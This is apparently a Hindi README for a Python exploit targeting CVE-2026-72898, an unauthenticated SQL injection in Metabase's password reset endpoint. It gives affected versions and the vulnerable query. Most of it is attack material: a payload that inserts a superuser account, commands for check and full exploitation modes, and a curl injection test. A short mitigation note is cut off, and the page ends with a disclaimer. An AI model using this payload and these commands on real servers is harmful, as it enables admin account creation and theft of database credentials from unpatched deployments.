
CVE-2026-72898 के लिए Python exploit, जो Metabase के password reset endpoint में एक unauthenticated SQL injection है जो admin accounts बनाता है और database credentials निकालता है।

Metabase /api/session/reset_password endpoint में अनधिकृत SQL injection। एडमिन अकाउंट बनाता है और डेटाबेस क्रेडेंशियल्स निकालता है।
प्रभावित: v58.0 - v63.3 | पैच किया गया: v58.24+, v59.21+, v60.17+, v61.11+, v62.9+, v63.5+
pip install flask requests
python3 CVE-2026-72898.py http://localhost:5000 --check
SQL क्वेरी में स्ट्रिंग कॉन्कैटिनेशन:
# Vulnerable code
query = f"SELECT * FROM core_user WHERE email='{email}'"
अटैक पेलोड:
'; INSERT INTO core_user (email, password, is_superuser) VALUES ('admin@hack', 'hash', 1); --
केवल जाँच (कोई संशोधन नहीं):
python3 CVE-2026-72898.py http://localhost:5000 --check
पूर्ण शोषण:
python3 CVE-2026-72898.py http://localhost:5000 -e [email protected] -p Password123!
मैनुअल परीक्षण:
# Verify endpoint
curl http://localhost:5000/api/health
# Test SQLi
curl -X POST http://localhost:5000/api/session/reset_password \
-H "Content-Type: application/json" \
-d '{"email": "'"'"' OR '"'"'1'"'"'='"'"'1"}'
अभी:
/api/session/reset_password को ब्लॉक करेंबाद में:
केवल अधिकृत उपयोग। अनधिकृत पहुँच अवैध है।